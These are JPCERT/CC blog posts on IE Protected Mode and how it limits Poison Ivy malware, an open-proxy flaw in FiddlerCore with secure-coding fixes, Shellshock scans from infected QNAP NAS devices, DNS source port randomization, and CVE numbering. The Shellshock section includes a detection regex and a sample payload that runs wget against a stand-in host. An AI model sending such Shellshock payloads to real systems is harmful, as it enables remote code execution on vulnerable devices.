
Jul 01, 2015

Protected Mode in Internet Explorer

Hello, this is Shusei Tomonaga again from the Analysis Center.

JPCERT/CC has been observing cases where vulnerabilities in Internet Explorer (“IE” hereafter) are leveraged in targeted attacks and the like, resulting in system takeover or configuration changes by a third party. In fact, IE has several functions to prevent such exploits. In this article, I will introduce one of them, “Protected Mode” – its overview and effects.


“Protected Mode” is a feature of IE 7 and later, enabled by default. It builds on an access control mechanism called “Integrity Level”, which was introduced with Windows Vista. Resources (such as files and registry entries) and processes each have an integrity level (currently High, Medium or Low, but extensible in the future). When a process accesses a resource, this mechanism requires that the integrity level of the accessing process be the same as, or higher than, that of the resource being accessed.

Figure 1: Integrity Level Concept Chart

Ordinary processes started from the Command Prompt have a “Medium” integrity level, while IE processes in Protected Mode have a “Low” integrity level. Child processes have an integrity level equal to or lower than that of their parent. As a result, malware launched through an IE vulnerability runs at “Low” integrity level, whether as an IE process or as one of its child processes. Consequently, the malware has limited access to resources, which is expected to limit its intended behaviour.

Figure 2: Integrity Level of Malware Run by Leveraging IE Vulnerability (Displayed by Process Explorer)


In order to verify how IE Protected Mode is effective in reducing damage by malware infection, we analysed how malware behaviour is limited in such environment. We took Poison Ivy as an example. Table 1 below describes the result of the analysis.

Table 1: Poison Ivy's Attack Vector and Behaviour under Protected Mode
Item / Poison Ivy's Attack Vector / Behaviour under Protected Mode

1. Send information of infected computers (host name, IP address, etc.): Capable
2. Create/delete/download files/folders, execute programs: Limited (only able to create/delete “Low” integrity level files/folders, e.g. the “%TEMP%\Low” folder)
3. Create/modify/delete/view/search registry entries: Limited (unable to create/modify/delete)
4. Obtain list of running processes, suspend processes: Capable
5. Obtain list of installed applications: Capable
6. Window-related commands (obtain information/image, key input, display, hide, maximise, minimise)
7. Screen capture: Capable
8. Execute arbitrary shell commands: Limited (executable only at “Low” integrity level)

As shown in Items 2 and 3 in the table, the malware can neither create files in Startup folders nor create registry entries, so it cannot configure itself for auto-run. Consequently, the malware process disappears upon system shutdown and does not run persistently on the computer. However, other malware functions which could lead to information leakage (e.g. sending information about the infected computer, taking screen captures) are not blocked even under Protected Mode. This is because the operations restricted by integrity levels are configured per resource as an access policy, and a policy does not necessarily restrict all operations (write/read/execute). Table 2 below shows the items which can be configured in an access policy.

Table 2: Configurable Items in Access Policy
No-Write-Up: rejects writing from a lower integrity level
No-Read-Up: rejects reading from a lower integrity level
No-Execute-Up: rejects execution from a lower integrity level

For example, a text (.txt) file created by Notepad in a document folder has a “Medium” integrity level and, by default, only a “No-Write-Up” access policy. Therefore, if malware running at “Low” integrity level attempts to write to this file, the write fails. However, since the file has no “No-Read-Up” policy, the malware can still read it – hence information leakage cannot be prevented.

Figure 3: File Access Policy (Displayed by AccessChk)
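The integrity-level check and the per-operation access policies described above can be sketched as a toy model. This is an illustration of the concept only, not the actual Windows API; all names here are made up:

```python
# Toy model of Windows integrity levels and per-operation access policies.
# Illustrative only -- the real checks are enforced by the Windows kernel.

LEVELS = {"Low": 1, "Medium": 2, "High": 3}

def is_allowed(op, proc_level, res_level, policies):
    """Return True if a process at proc_level may perform op
    ("write"/"read"/"execute") on a resource at res_level,
    given the resource's set of access policies."""
    if LEVELS[proc_level] >= LEVELS[res_level]:
        return True  # equal or higher integrity: not restricted
    # Lower-integrity access is rejected only for policed operations
    policy = {"write": "No-Write-Up",
              "read": "No-Read-Up",
              "execute": "No-Execute-Up"}[op]
    return policy not in policies

# A Medium-integrity .txt file with the default No-Write-Up policy only:
doc_policies = {"No-Write-Up"}
print(is_allowed("write", "Low", "Medium", doc_policies))  # False: write blocked
print(is_allowed("read", "Low", "Medium", doc_policies))   # True: read still allowed
```

Because the default file policy includes only No-Write-Up, the “Low” integrity malware process fails to write but can still read, which matches the information-leakage caveat above.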


Protected Mode can remove the risk of malware persisting across reboots. However, the above analysis clearly indicates that it is not robust enough against information theft.

In fact, IE has a stronger security feature called “Enhanced Protected Mode”, which is expected to prevent further damage. In the coming entry, I will introduce this enhanced feature.

Thank you for reading and see you soon.

- Shusei Tomonaga


[1] Understanding and Working in Protected Mode Internet Explorer


May 28, 2015

FiddlerCore's insecure Default flag may lead to an Open Proxy issue

NOTE: This article, originally published on May 28, 2015, was updated as of June 8, 2015 (See below).

Just two days ago, we published an advisory (in Japanese) on an open proxy issue in KanColleViewer, a widely used, open source utility app for a web browser game. The game, Kantai Collection, is explosively popular: its official Twitter account has over 1 million followers and, according to its tweets, the game had 3 million registered players as of May 2015. The issue was due to the insecure configuration of a proxy server launched by the app, which allowed any Internet user to access the proxy. Given the app's large user base and the nature of the issue, Internet-wide scans against 37564/TCP (the app's proxy port) have been observed.

In this article, I will elaborate a bit more on the technical aspect of the issue to provide secure coding tips for developers.

KanColleViewer is a Windows desktop app written in C# with WPF. The app uses the IE shell for web browsing and FiddlerCore for capturing HTTPS traffic between the client and the game server. It was designed to improve the UI experience of the game, and thus acquired a large user base (2 million downloads as of August 2014, according to the developer).

FiddlerCore is a .NET class library for C# apps. With this library, developers can launch a web proxy inside their apps and capture and modify HTTP/HTTPS traffic, just as with Fiddler, the well-known web debugging proxy tool.

Now, who is going to use the web proxy launched in the app?

Because the app only needs to capture its own user's (the game player's) traffic, the proxy should be used exclusively by that user. However, the proxy was launched in a way that made it accessible to remote users as well, serving as an "Open Proxy".

If you take a look at the source code of the vulnerable version 3.8.1, the proxy was launched by calling FiddlerApplication.Startup() in the following way:

public void Startup(int proxy = 37564)
{
    FiddlerApplication.Startup(proxy, false, true);
    FiddlerApplication.BeforeRequest += this.SetUpstreamProxyHandler;

    SetIESettings("localhost:" + proxy);

    this.compositeDisposable.Add(this.connectableSessionSource.Connect());
    this.compositeDisposable.Add(this.apiSource.Connect());
}

FiddlerApplication.Startup() is an overloaded method with three implementations, taking two, three and four arguments. According to the FiddlerCore documentation (which you can download from http://www.telerik.com/fiddler/fiddlercore), the three- and four-argument versions are NOT RECOMMENDED.

Now, the recommended way to start the proxy instance of FiddlerCore is by calling the following two-argument version of the Startup():

public static void Startup(
       int iListenPort,
       FiddlerCoreStartupFlags oFlags
)
The first argument is the port number of the proxy. The second argument is the flag options passed into the Startup method.

How should we specify the flag? According to the documentation, using the 'Default' is recommended as below:

The FiddlerCoreStartupFlags option you want to set;

FiddlerCoreStartupFlags.Default is recommended

Unfortunately, the 'Default' flag is NOT SAFE. It will open the door for 'Open Proxy'.

If you use FiddlerCoreStartupFlags.Default, your app's proxy will accept connections from remote clients as well. I used the FiddlerCoreAPI SampleApp (which comes with the free download of FiddlerCore) for testing purposes and got the following result:


The 'Default' flag will enable 'AllowRemoteClients' option which may not be what you exactly want.


Going back to KanColleViewer, the issue was fixed in version 3.8.2. The app now calls Startup() method in a safer way:

public void Startup(int proxy = 37564)
{
    FiddlerApplication.Startup(proxy, FiddlerCoreStartupFlags.ChainToUpstreamGateway);

'ChainToUpstreamGateway' option will instruct FiddlerCore to use the system proxy as an upstream gateway proxy.

It seems that a number of websites show the insecure call to Startup(). A brief search on stackoverflow.com for 'FiddlerApplication.Startup' turned up enough examples that may lead to this issue.

So tips for developers:

  • Use the two-argument Startup() method
  • Don't use FiddlerCoreStartupFlags.Default
  • Instead, specify the options you really need
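The underlying pitfall applies to any embedded server, not just FiddlerCore. As a language-neutral illustration (hypothetical Python, not the app's actual C# code): a helper proxy meant only for the local user should bind to the loopback interface, so remote clients simply cannot connect:

```python
import socket

def open_local_listener(port=0):
    """Listen on the loopback interface only, so remote hosts cannot
    connect. Binding to "" or "0.0.0.0" instead would accept remote
    clients -- the moral equivalent of FiddlerCore's AllowRemoteClients."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", port))  # loopback only; port=0 picks a free port
    s.listen(5)
    return s

listener = open_local_listener()
host, port = listener.getsockname()
print(host)  # 127.0.0.1 -- not reachable from other machines
listener.close()
```

Whatever the library, the safe pattern is the same: make "local only" the explicit choice, and treat any flag that widens the listening scope as opt-in.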

Lastly, I'd like to thank the developer Mr. Manato KAMEYA for coordinating with JPCERT/CC smoothly and disclosing the security issue in a responsible manner.

Masaki Kubo @ Vulnerability Analysis Team

Update on June 8, 2015

After a few discussions with the developer of FiddlerCore@Telerik, they've decided to exclude AllowRemoteClients from the Default flag in their next release:

... out of an abundance of caution we will be making a breaking change to the next build of FiddlerCore to require developers explicitly opt-in to Allowing Remote clients.(http://www.telerik.com/forums/fiddlercorestartupflags-default-enables-allowremoteclients#1xtYFqA1LUqoNGXx-h6aKw)

I appreciate Telerik for the decision to make developers and their users more secure.

Dec 25, 2014

Increase in Possible Scan Activity from NAS Devices

Happy holidays to all, this is Tetsuya from Watch and Warning Group. Today, I would like to share a recent, remarkable trend discovered through TSUBAME sensors.


In TSUBAME, we have observed a significant increase in packets destined for 8080/TCP since December 5th, 2014. When we accessed the source IP addresses with a web browser, many of them, particularly addresses from certain regions, displayed the admin login screen of NAS devices made by QNAP.


[Figure 1: Scan count per hour observed at 8080/TCP from December 2nd, 2014 onwards (Source: TSUBAME)]


Below are some characteristics that we noticed from TSUBAME data:

  - Increase in packets to port 8080/TCP since December 5th, 2014

  - The TTL value of most packets was between 30 and 59

  - A scan attempt sends 1 or 2 packets (the second packet is a retransmission)

  - A source IP does not continuously scan a particular destination IP (the majority scan only once)



Also we were able to verify the following after checking some of the source IP addresses:

  - When accessing port 80/TCP of the source address, a redirect to port 8080/TCP occurs and the admin login screen of a QNAP NAS is shown

  - The QNAP firmware appears to be version 4.1.0 or earlier (information taken from the screen that is shown; 4.1.0 and earlier are affected by Shellshock) (*1)


Using an environment separate from TSUBAME, we checked the packets sent by an infected QNAP device and saw the following request (there are several variants).


[Figure 2: Sample request from infected device (Source: JPCERT/CC)]


When a QNAP NAS device running a vulnerable version of the firmware receives this request, the Shellshock vulnerability is leveraged to download a malicious program from the Internet and infect the device with malware (*2, *3). Once infected, the device begins to search for other vulnerable NAS devices. Because of this behaviour, a large number of NAS devices became infected, and we believe this is the reason for the sudden increase in packets to 8080/TCP.
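For administrators inspecting web or proxy logs, the exploit pattern is easy to spot: Shellshock (CVE-2014-6271) payloads embed a bash function definition, "() {", in an HTTP header or CGI variable. A minimal, hypothetical detector sketch (a heuristic, not a complete IDS rule):

```python
import re

# Shellshock payloads start a header value with a bash function
# definition, e.g.  User-Agent: () { :; }; /bin/sh -c '...'
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def looks_like_shellshock(header_value):
    """Heuristic check for the characteristic '() {' marker."""
    return bool(SHELLSHOCK_RE.search(header_value))

print(looks_like_shellshock("() { :; }; wget http://example.test/x"))  # True
print(looks_like_shellshock("Mozilla/5.0 (Windows NT 6.1)"))           # False
```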


The vendor has released firmware that addresses the Shellshock vulnerability. If you have yet to apply the update, we recommend that you first check whether you have been infected (*2).


  (*1) JVN#55667175 QNAP QTS vulnerable to OS command injection

  (*2) The Shellshock Aftershock for NAS Administrators

  (*3) Worm Backdoors and Secures QNAP Network Storage Devices

  (*4) An Urgent Fix on the Reported Infection of a Variant of GNU Bash Environment Variable Command Injection Vulnerability



Thank you for reading, and we wish you all the best for the coming year.


- Tetsuya Mizuno

Dec 11, 2014

Year in Review - Vulnerability Handling and Changing with the Times

Hello and Happy Holiday Season to everybody.

Taki again, and today I will write about some experiences in product (software, hardware) vulnerability coordination this year.


 - Introduction -

A lot happened this year and I do not have the time to go through everything, but I would like to go over some of the major issues that we handled and, for those who are not familiar, provide a very brief overview of our coordination activities.

Before I move on, our vulnerability advisories are published at Japan Vulnerability Notes (JVN). Other CSIRTs across the globe have their own sites like this, such as CERT/CC and NCSC-FI. While CERT/CC publishes quite a few advisories each year, NCSC-FI only publishes several high-profile issues each year that affect a large number of users.

The number of published advisories on JVN is shown below.



[Figure 1 - Number of product vulnerability-related advisories published on JVN per quarter since the 2nd quarter of 2011 (Source: JPCERT/CC)]


What can be seen on JVN are advisories for vulnerabilities in products, which direct users to fixes, updates, patches, etc. for the products they use. However, this is merely a small portion of the work involved in our vulnerability handling activities.

We coordinate the disclosure of product vulnerabilities with developers and researchers so that they do not become 0-days, where information about a vulnerability is disclosed without a way for users to resolve it. Some of you may have heard the phrase "Coordinated Disclosure," which is what we attempt to do.


 - This Year -

This past year, we were involved in a few high profile cases which even received media attention.

 One of these issues was the so-called "Heartbleed" vulnerability in OpenSSL. There are quite a few articles on the web that describe the disclosure timeline, so I will not get into those details here. As an aside, here is a previous entry that describes how Japanese organizations dealt with Heartbleed.

We received information on this issue a few days prior to disclosure from one of our global counterparts. As we were about to begin the coordination process with developers, the issue was disclosed by the OpenSSL team.

This case taught us (again!) that while reports may be sent to us in a confidential manner, this does not mean that we are the only ones that have this information.


[Figure 2 - Sample image of vulnerability handling information flow during a coordination effort (What a mess!) (Source: JPCERT/CC)]

This is especially true in cases that involve open-sourced software. There were quite a few high-profile advisories involving OpenSSL this year (CCS Injection, POODLE attack, etc.) which eventually led to the OpenSSL team releasing a new security policy  related to addressing vulnerabilities.

Pre-disclosure (notification prior to public disclosure) for such open source products used to be done through mailing lists or separate e-mails to relevant parties. Now most major open source projects pre-disclose only to certain groups of developers that need fixes first, and the rest of the world learns about the issue at the same time. This is also true of software provided by the Internet Systems Consortium (ISC), such as BIND.

- The next step in vulnerability handling -

The experiences I had over this past year have shown me that not only are more and more people looking for vulnerabilities, but the information is moving at high speed among a variety of parties, some of whom have no idea that another group also holds that information.

In general, the fewer parties involved in a coordination effort, the better. Not only does this reduce the probability that the information gets disclosed prematurely, but it also provides the developer better control as to how this non-public vulnerability information is being handled.

As a coordination center, we serve as the intermediary between the reporter and the developer. If a reporter can report and communicate with the developer directly, then I believe they should do so. Our involvement in such a case is unnecessary and in fact costs time, since each communication has to pass through an additional party.

However for cases involving open sourced software that is implemented in various products, further coordination becomes necessary and this is where we can (and have been able to) provide value in a coordination effort.

Vulnerability handling has been evolving from a series of one-to-one communications to cases where various parties (often not in contact with each other) are involved in a single case at the same time. Hopefully we can continue to evolve with the times, providing maximum value to coordination efforts so that the proper information reaches the relevant parties.

I wish everybody a safe and wonderful holiday season!

Takayuki (Taki) Uchiyama

Apr 18, 2014

Source Port Randomization for Caching DNS Servers Requested, yet again.

Hello, this is Moto Kawasaki, a new member of Global Coordination Division.


Alerts from JPRS and JPCERT/CC

On April 14th, 2014, JPRS (Japan Registry Services Co., Ltd.) and JPCERT/CC concurrently published alerts on DNS cache poisoning attacks.


     Alert from JPRS

     http://jprs.jp/tech/security/2014-04-15-portrandomization.html (Japanese version)


     Alert from JPCERT/CC

     https://www.jpcert.or.jp/english/at/2014/at140016.html (English version)

     https://www.jpcert.or.jp/at/2014/at140016.html (Japanese version)


Now I'd like to elaborate on the key points and share my views on the case by reading between the lines of these alerts.


The effect of Source port randomization against cache poisoning

In its alert, JPRS requests that DNS server administrators randomize the UDP source port from which caching DNS servers send out query packets, as a mitigation against cache poisoning attacks.


Cache poisoning is a long-standing threat to caching DNS servers: an attacker injects arbitrary entries to divert users to malicious web sites, mail servers, and so forth.

In 2008, Dan Kaminsky disclosed a method that defeats the TTL (Time-To-Live) protection by using names that are not yet cached as the query name. The news astonished people because it made continuous attacks possible, shortening the attack window from "once in several hours" to "almost anytime".


On the other hand, source port randomization is considered the first-choice, mandatory mitigation. Because it makes it difficult for attackers to predict which port in the randomized range they should send malicious packets to, source port randomization reduces the probability of a successful attack by a factor of tens of thousands. This is why JPRS recommends source port randomization.
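To put rough numbers on this: with a fixed source port, the attacker only needs to guess the 16-bit DNS transaction ID; randomizing the port multiplies the search space by the number of usable ports. A back-of-the-envelope sketch (the ephemeral port range used here is an assumption; real resolvers vary):

```python
# Rough per-forged-packet spoofing odds, before vs. after source port
# randomization. Assumes the attacker must match both the 16-bit DNS
# transaction ID and the (randomized) source port of the query.

txid_space = 2 ** 16            # 16-bit DNS transaction ID
port_space = 65535 - 1024 + 1   # assumed usable ephemeral port range

fixed_port_odds = 1 / txid_space
random_port_odds = 1 / (txid_space * port_space)

print(f"fixed port:      1 in {txid_space:,}")
print(f"randomized port: 1 in {txid_space * port_space:,}")
```

The ratio between the two odds is the port space itself, on the order of tens of thousands, which is the improvement factor mentioned above.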


But why re-emphasize the risk of cache poisoning and the importance of source port randomization now? JPRS cited two recent findings in their alert.

One is that large ISPs in Japan informed JPRS that they are observing an increase in cache poisoning attacks using Kaminsky's method.

The other is that JPRS found that approximately 10% of the source IP addresses sending DNS queries to the JP DNS servers had NOT yet randomized their source ports.

JPRS kindly supplied a graph (Figure 1) showing the observed proportion of source port randomization over time. Several cliffs and swells can be seen, along with an overall declining trend. One of the cliffs may reflect the aftereffects of Kaminsky's presentation, or the release of DNS software that randomizes the source port by default. Even so, 10% of the IP addresses still send queries from static (fixed) or limited (predictable) source ports.


Figure 1: Transition of source port randomization status (Apr 2006 to Apr 2014).

Source: JPRS (http://jprs.jp/tech/security/2014-04-15-portrandomization-status-e.pdf)


These findings imply, I think, that a large number of caching DNS servers are still vulnerable to cache poisoning. For the users of such servers, this can escalate into domain name hijacking and the like.


Our gratitude and action in the near future

Based on the list of vulnerable caching DNS servers provided by JPRS, JPCERT/CC is going to notify administrators so that they can fix their settings. It is our great pleasure to cooperate with other parties, just as we did with JPRS in handling this case.


Finally, I hope this blog entry helps address the issue and brings us closer to a world of randomized source ports :-)


Thank you.

Moto Kawasaki

Jul 09, 2013

The votes are in - and we have a new CVE numbering scheme!

[Update 2013.8.1]
MITRE has prepared a page describing the change in CVE format.
The page is at the following:

   CVE-ID Syntax Change

Stated on the site, this change is scheduled to take effect on January 1, 2014. This page describes some of the background behind the change and towards the bottom of the page there is a list of some frequently asked questions.

Hello, this is Taki again and this is an update to a previous entry that I wrote on CVE identifiers.

For details on what CVE is, please refer to my previous entry or the CVE website.

As I wrote in my previous entry, CVE is undergoing a numbering scheme change and the editorial board voting has been completed.

After two rounds of voting, Option B was elected as the new numbering scheme.
To review, Option B specifies the following (quoted directly from the announcement):

- Variable length
- 4-digit year + four fixed digits for IDs up to 9999
- IDs 0001 through 0999 padded with leading zeros
- IDs over 9999 expand as needed, with no leading zeros

Examples:

- Four-digit IDs (through 9999)
    - CVE-2014-0001, CVE-2014-0999
    - CVE-2014-1234, CVE-2014-9999

- Five-digit IDs (> 9999)
    - CVE-2014-10000, CVE-2014-54321, CVE-2014-99999

- Six-digit IDs (> 99999)
    - CVE-2014-100000, CVE-2014-123456, CVE-2014-999999

- Etc., as needed

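The rules above are simple to capture in code. A small, hypothetical helper (not an official tool) that formats sequence numbers under Option B:

```python
def format_cve(year, seq):
    """Format a CVE ID under the Option B syntax: at least four digits,
    zero-padded below 1000, expanding without padding beyond 9999."""
    if seq < 1:
        raise ValueError("sequence numbers start at 1")
    # ':04d' pads to four digits but never truncates larger numbers
    return f"CVE-{year}-{seq:04d}"

print(format_cve(2014, 1))       # CVE-2014-0001
print(format_cve(2014, 9999))    # CVE-2014-9999
print(format_cve(2014, 10000))   # CVE-2014-10000
print(format_cve(2014, 123456))  # CVE-2014-123456
```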
According to MITRE, this new scheme will become effective January 1, 2014.

Transition plans and other specifics will become available as time goes on.
If there are any developments, I will notify via this blog.

For any questions, please contact me at vultures(at)jpcert.co.jp

- Taki Uchiyama


Feb 13, 2013

CVE is about to undergo a change in syntax for CVE identifiers

Hello, it's Taki here and it has been a long time since I last wrote here.

Today's topic is about the following:

Call for Public Feedback on Upcoming CVE ID Syntax Change

Before I get into the details of what is said here, I would like to quickly introduce CVE. CVE stands for Common Vulnerabilities and Exposures and it is managed by The MITRE Corporation in the US. CVE identifiers are unique, common identifiers for publicly known information security vulnerabilities. For more details on CVE identifiers, please refer to the following:

About CVE Identifiers

So getting back to the discussion topic, CVE is about to undergo a change in the syntax for CVE identifiers. The current syntax, CVE-YYYY-NNNN, can only support a maximum of 9,999 unique identifiers in a given year.
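For reference, the current fixed-length form can be matched with a simple pattern. This is a hypothetical validator for illustration, not anything published by MITRE:

```python
import re

# Current CVE syntax: CVE-YYYY-NNNN, with exactly four digits in the
# sequence part -- hence the 9,999-per-year ceiling.
CURRENT_CVE_RE = re.compile(r"^CVE-\d{4}-\d{4}$")

def is_current_syntax(cve_id):
    return bool(CURRENT_CVE_RE.match(cve_id))

print(is_current_syntax("CVE-2013-0001"))   # True
print(is_current_syntax("CVE-2013-10000"))  # False: would need a new syntax
```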

There are many users of CVE across the globe and a syntax change may affect a number of users, thus the CVE project is soliciting feedback prior to changing the syntax.

There are three options to choose from, and I will list them in my order of preference with some reasoning behind each placement. (For details on the exact syntax of each option, please refer to the MITRE announcement.)

1. Option A
This requires the least change, and I expect users already familiar with the current CVE syntax would make the transition without too many issues. Selfishly, since this option requires the least change, it would also be easier to explain the differences, and the reasons for them, to newer users of CVE.

2. Option C
This is quite a drastic change from the current syntax but with the inclusion of the check digit, it would allow users to verify that the CVE identifier is a valid one. However, this syntax may be a little difficult to handle for product developers that incorporate CVE identifiers into their products.

3. Option B
I went back and forth a little between Options B and C, but the check digit that allows for validation (albeit by a simple method) made the choice for me. With Option B, in my opinion, it would be hard to determine whether an ID is valid, since the number of digits would be arbitrary.

JPCERT/CC has been working with MITRE since 2008 to have CVEs issued for advisories on Japan Vulnerability Notes (JVN). Since then, JVN has become CVE compatible and JPCERT/CC has become a CVE Numbering Authority (CNA). As a member of the vulnerability handling team, I have listed my opinions here and would certainly welcome any feedback or discussion.

As mentioned on the MITRE announcement, there is a mailing list for discussions as well.

Any questions should be directed to the mailing list, but if you would like to have a discussion offline, please feel free to contact me at vultures(at)jpcert.or.jp.

- Taki Uchiyama